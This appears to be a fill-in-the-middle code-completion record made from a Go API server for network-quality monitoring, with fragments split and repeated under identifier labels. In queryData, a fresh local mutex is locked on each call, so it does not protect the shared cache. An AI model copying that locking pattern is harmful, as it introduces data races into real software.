if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime | Time = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| <= 0 || t.EndTime <= 0 {
end | identifier_name |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int | ostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type H | identifier_body |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
